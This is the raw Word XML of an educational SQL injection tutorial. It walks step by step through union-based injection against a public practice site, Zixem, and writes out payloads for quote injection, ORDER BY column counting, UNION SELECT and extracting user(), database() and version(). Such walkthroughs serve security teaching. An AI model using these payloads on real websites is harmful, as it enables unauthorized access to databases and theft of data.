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3A2CDF" w:rsidRDefault="00000000" w14:paraId="77B532FA" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:b/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:b/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> Understanding SQL Injection: A Guide with 5 Educational Steps</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="003A2CDF" w14:paraId="7D719794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3A2CDF" w14:paraId="09D1053A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2C22A4F" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="280"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:b/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_1zwz671xtuv6" w:colFirst="0" w:colLast="0" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:b/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>What is SQL Injection?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="5DDDE0E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SQL Injection (SQLi) is a prevalent web application security weakness that enables an attacker to inject malicious SQL into a database that an application issues. It occurs when untrusted input is inserted directly into SQL statements without validation or sanitization.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="003A2CDF" w14:paraId="240AE833" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="280"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:b/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_k8a7nw3t6ve0" w:colFirst="0" w:colLast="0" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="517AA8EB" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="280"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:b/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_1hhebm1gq743" w:colFirst="0" w:colLast="0" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:b/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Why Does SQL Injection Matter?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="69AF28A5" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="240"/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Can bypass login systems</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidP="483A5B68" w:rsidRDefault="00000000" w14:paraId="7FB723A5" w14:textId="77777777" w14:noSpellErr="1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="483A5B68" w:rsidR="483A5B68">
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Access, alter, or delete sensitive information</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="2FDF6BC0" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr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Perform administrative tasks on the database</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="29357380" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="240"/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In certain instances, read OS files or gain access at the system level</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="029CCBAC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The Objective of SQL Injection is to control SQL queries in a manner that returns unauthorized information or alters application behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidP="483A5B68" w:rsidRDefault="00000000" w14:paraId="543E349D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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="483A5B68" w:rsidR="483A5B68">
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>We will guide you through a SQL injection demo on the "</w:t>
      </w:r>
      <w:r w:rsidRPr="483A5B68" w:rsidR="483A5B68">
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Zixem</w:t>
      </w:r>
      <w:r w:rsidRPr="483A5B68" w:rsidR="483A5B68">
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>" website, hosted at Altervista.org, which is frequently used in ethical hacking forums as a demonstration site for learning SQL injection techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="71754E8A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Here, we have divided the SQL injection into five steps. Please follow the steps on this website to conduct SQL injection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="003A2CDF" w14:paraId="3C52FD5E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</w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="003A2CDF" w14:paraId="56CED517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</w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="003A2CDF" w14:paraId="57D1BA4E" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidP="483A5B68" w:rsidRDefault="00000000" w14:paraId="23E53235" w14:textId="77777777" w14:noSpellErr="1">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="483A5B68" w:rsidR="483A5B68">
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Condition: Variable = Number. If this condition is present in the </w:t>
      </w:r>
      <w:r w:rsidRPr="483A5B68" w:rsidR="483A5B68">
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>website</w:t>
      </w:r>
      <w:r w:rsidRPr="483A5B68" w:rsidR="483A5B68">
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> you can perform SQL attack on it. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="2AC3D60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1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Break the Query Syntax (Quote Injection)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="35F5811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Goal: Cause a syntax error to confirm injection point. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="26650C1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Input field: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="0D8DC0E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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="122EED29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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="2D4D060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This might break the query. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="7EEDF77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2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Balance and Comment the Query</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidP="483A5B68" w:rsidRDefault="00000000" w14:paraId="0A3C5D4A" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="483A5B68" w:rsidR="483A5B68">
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Goal: Balance the query and stop the rest of the </w:t>
      </w:r>
      <w:r w:rsidRPr="483A5B68" w:rsidR="483A5B68">
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQl</w:t>
      </w:r>
      <w:r w:rsidRPr="483A5B68" w:rsidR="483A5B68">
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> execution using comment syntax.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="48D3A27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MySQL: -- or #</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="7A0DA7F7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MSSQL: --</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="78F1BA05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Oracle: --</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="6C7A456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Here we will be using custom comment variants: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="29C6714B" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before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--+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="3CF5061D" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:num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-- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="1EF86566" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing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--/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="3A56ABE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 -- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="2A0CCEE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3:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Find the Number of Columns</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="486B1B0F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lastRenderedPageBreak/>
        <w:t>Goal: Use Order by to guess the number of columns.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="4FF9FACB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 order by 1 -- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="4417309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 order by 2 -- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="48B0BBF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 order by 3 -- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="3F27F721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4’ order by 4 -- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="7B40854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When the page errors out, the last working number is the number of columns. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="7544E76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4:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Find the Vulnerable Column and disable the profile=4’ by adding - sign.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="6F6E3DB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Goal: Use Union Select to find which column displays output.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="7341C96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Assume number of columns are 4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="3DD94CD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-4’ union select 1,2,3,4 -- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="5466944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Whichever number appears on the page (e.g., 2 or 3), that is the vulnerable column. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="7E532109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Step 5: Exploit the Vulnerable Column</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="56274DC7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Goal: Extract sensitive information using SQL functions. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="3CDFC0B5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profile id: -4’ union select user(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>),database</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(),version(),4 -- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="6EF0AB6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Current DB user:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>user(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="21ED865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Database name: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>database(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="30474FF5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DB version:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>version(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="003A2CDF" w14:paraId="3AD3451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560F64F1" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:b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Now let’s try this on a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Zimex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> labs:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="27A0519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w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="1AAA41EA" wp14:editId="10AF7797">
            <wp:extent cx="5943600" cy="2222500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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2CDF" w:rsidRDefault="003A2CDF" w14:paraId="4C67A244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EC8E751" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:num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Choose Level 2 and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>lets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perform SQL injection here </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="3C5ED56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368B9D92" wp14:editId="2528A8FB">
                <wp:extent cx="5943600" cy="184150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41500"/>
                          <a:chOff x="152400" y="152400"/>
                          <a:chExt cx="5943600" cy="1828800"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture"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5187813" name="Rectangle 1655187813"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1991425" y="1370975"/>
                            <a:ext cx="1601100" cy="1500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28022DCF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style="width:468pt;height:145pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59436,18288" coordorigin="1524,1524" o:spid="_x0000_s1026" w14:anchorId="368B9D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&#13;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Shape 2" style="position:absolute;left:1524;top:1524;width:59436;height:18288;visibility:visible;mso-wrap-style:square" o:spid="_x0000_s1027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">
                  <v:imagedata o:title="" r:id="rId7"/>
                </v:shape>
                <v:rect id="Rectangle 1655187813" style="position:absolute;left:19914;top:13709;width:16011;height:1500;visibility:visible;mso-wrap-style:square;v-text-anchor:middle" o:spid="_x0000_s1028" filled="f" strokecolor="red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28022DCF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1D2CEAF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As we all can see, here our condition is fulfilled. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="5F3EE1D1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Variable=Number, which means we can perform SQL injection here.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="0A69F1D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3E76ED7" wp14:editId="0093F6CA">
                <wp:extent cx="5943600" cy="444500"/>
                <wp:effectExtent l="0" t="0" r="0" b="0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4500"/>
                          <a:chOff x="152400" y="152400"/>
                          <a:chExt cx="5943600" cy="428625"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="52" name="Shape 52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930825" name="Rectangle 154930825"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1481050" y="260175"/>
                            <a:ext cx="1380900" cy="1500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1243891F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" style="width:468pt;height:35pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59436,4286" coordorigin="1524,1524" o:spid="_x0000_s1029" w14:anchorId="23E76ED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">
                <v:shape id="Shape 52" style="position:absolute;left:1524;top:1524;width:59436;height:4286;visibility:visible;mso-wrap-style:square" o:spid="_x0000_s1030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">
                  <v:imagedata o:title="" r:id="rId9"/>
                </v:shape>
                <v:rect id="Rectangle 154930825" style="position:absolute;left:14810;top:2601;width:13809;height:1500;visibility:visible;mso-wrap-style:square;v-text-anchor:middle" o:spid="_x0000_s1031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1243891F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1D6F493B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51590F89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1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> $ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>showprofile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=4’ </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>( to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generate the error)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="60B5CFF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w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="476F5E34" wp14:editId="167DBAEC">
            <wp:extent cx="5943600" cy="208280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2CDF" w:rsidRDefault="00000000" w14:paraId="39F7FE5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1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> $ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>showprofile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=4’ </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>( to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generate the error)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="79E6022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7078C05B" wp14:editId="63784DFB">
                <wp:extent cx="5943600" cy="231140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11400"/>
                          <a:chOff x="152400" y="152400"/>
                          <a:chExt cx="5943600" cy="2295525"/>
                        </a:xfrm>
                      </wpg:grpSpPr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4906253" name="Rectangle 234906253"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="560400" y="1991425"/>
                            <a:ext cx="4933500" cy="2301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701311EA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style="width:468pt;height:182pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59436,22955" coordorigin="1524,1524" o:spid="_x0000_s1032" w14:anchorId="7078C05B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">
